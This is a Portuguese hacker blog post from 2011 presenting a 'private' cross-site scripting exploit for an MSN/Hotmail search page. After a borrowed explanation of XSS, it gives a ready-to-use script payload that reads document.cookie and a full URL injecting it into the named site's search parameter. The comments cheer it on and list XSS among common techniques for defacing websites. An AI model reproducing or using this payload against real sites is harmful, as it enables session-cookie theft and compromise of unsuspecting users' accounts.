Private Hotmail XSS 2011 – Video Aula

Publicado por Dia 5 de julho de 2011 em Video Aulas | 2 Comentários | 7.111 Acessos

Cross-site scripting (XSS) é um tipo de vulnerabilidade do sistema de segurança de um computador, encontrado normalmente em aplicações web que activam ataques maliciosos ao injectarem client-side script dentro das páginas web vistas por outros usuários. Um script de exploração de vulnerabilidade cross-site pode ser usado pelos atacantes para escapar aos controlos de acesso que usam a mesma política de origem.

Ataque:

Através de um XSS, o Cracker injeta codigos JavaScript em um campo texto de uma página já existente e este JavaScript é apresentado para outros usuários.

Exemplo de ataque: Imaginem que o cracker insira em um fórum de um website alvo de ataque, um texto que contenha um trecho de JavaScript. Este JavaScript poderia, por exemplo, simular a página de login do site, capturar os valores digitados e enviá-los a um site que os armazene. Quando o texto do fórum for apresentado a outros usuários, um site atacado pelo XSS exibirá o trecho de JavaScript digitado anteriormente nos browsers de todos os outros usuários, provocando a brecha de ataque.

Fonte da explicação: Wikipédia

Xss Msn.com inject :P

Link e codigo utilizado na aula:

Private Hotmail XSS 2011

http://glo.msn.com/search?searchTerm=

Xss:
“><script>alert(document.cookie) ;</script>

Como utilizar:

http://glo.msn.com/search?searchTerm=”><script>alert(document.cookie) ;</script>

Att

Diablos 4-Ever :)

Tags: , , ,
0 votes, average: 0,00 out of 50 votes, average: 0,00 out of 50 votes, average: 0,00 out of 50 votes, average: 0,00 out of 50 votes, average: 0,00 out of 5 (0 votos, média: 0,00 por 5)
You need to be a registered member to rate this post.
Loading ... Loading ...

Sobre Diablos 4-Ever

Eu não exploro as falhas, São as falhas que me exploram.
Inscreva-se no RSS Feed dos comentários desta postagem

2 Respostas

  1. XDMlC
    5 de julho de 2011 at 2:57 PM

    Pow cara sou seu fãn , mas ai tem como concerta o pacote de video aulas de visual basic , o link ta quebrado

  2. Sasuriki DLL
    11 de fevereiro de 2012 at 11:04 AM

    Muito bom , XSS é uma das 4 vulnerabilidades mais usadas hoje em dia para defacements as outras são : SQL Injection , PHP Injection e FTP Defacer

Leave a Reply

O seu endereço de email não será publicado Campos obrigatórios são marcados *

*
*